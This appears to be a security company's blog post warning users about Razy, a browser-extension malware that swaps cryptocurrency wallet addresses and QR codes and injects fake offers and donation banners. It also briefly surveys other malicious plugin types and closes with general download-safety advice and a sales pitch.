Razy: Browser Malware that Steals Cryptocurrency
Malware that infects the browser can do serious damage to users. It can alter any pages, inserting ads and changing existing content. It can redirect online payments. A malicious browser extension called Razy has turned up recently, and it carries a slew of techniques for stealing cryptocurrency. It's specific to Windows, but it attacks at least three different browsers: Firefox, Chrome, and the Russian Yandex browser.
How Razy gets into the browser
Browser plugins or extensions are useful things. They let people get extra information about sites, block unwanted ads, and guard against untrusted pages. The problem comes when they aren't supposed to be there, or when they don't do what they advertise. The browser API lets them do almost anything to a page, even if it's nasty.
A secure connection to the site doesn't help. The correct, unaltered information goes from the website to the browser. A malicious extension changes the incoming data after it's received and verified.
People let Razy on their machines when they download supposedly useful software, either from actively malicious sites or from ones that don't screen their offerings well enough. The download first disables scanning of extensions on the browser, as well as automatic installation of updates. Then it installs the Razy plugin. On Firefox it's called "Firefox Protection," and on Yandex it's "Yandex Protect." It does anything but protect. On Chrome, it isn't even visible in the list of extensions.
How Razy robs users
Razy's specialty is stealing cryptocurrency, such as Bitcoin. It has a whole collection of ways to do it:
Cryptocurrency payments are made to "wallets," which are identified by long strings of characters. Razy replaces Bitcoin and Ethereum wallets on visited pages with its own wallet, so any payment will go to the thief instead of the intended payee. Cryptocurrency payments are anonymous and irreversible. The victim won't know anything went wrong until the recipient complains about not getting paid. Then it's too late.
Some currency exchanges accept payments by displaying a QR account code for users to scan to their phones. Razy changes the code to its own wallet. Users think they're buying currency to add to their own accounts, but they're actually sending funds to the people operating the scam.
Razy injects "special offers" into currency exchanges to entice people to buy more Bitcoin or Ethereum. Again, the money goes to the thieves instead of to the user's wallet.
When users visit Wikipedia, Razy injects a banner asking for donations. Once again, the donations go to the scammers rather than to the Wikipedia Foundation. Other popular sites are similarly altered in the browser.
Malicious browser plugins
Browser plugins which do harmful things are nothing new. Razy just pushes their capabilities more than most do. Other types include:
Keyloggers. They collect all the user's keystrokes, including credit card numbers and passwords, and send them to a server somewhere. Some keyloggers serve legitimate purposes, but most are intended to steal information.
Other spyware. In addition to capturing keystrokes, spyware can record all the sites a user visits, read mail, and capture private social media messages. All that information can be useful for identity theft or creating convincing forged email.
Adware. The plugin can inject ads with links to dangerous or dishonest websites, or sometimes to semi-legitimate sites that use shady methods of attracting customers.
Unauthorised Web activity. A malicious plugin can send requests in the background. It could spam the user's friends, access online banking, or participate in a DDoS attack.
Users need to be careful about the software they download. They should watch for any unexpected changes in the appearance of familiar websites. Browser malware like Razy can lead not just to inconvenience, but to serious financial loss. If you're looking to develop a better cybersecurity strategy, talk to us.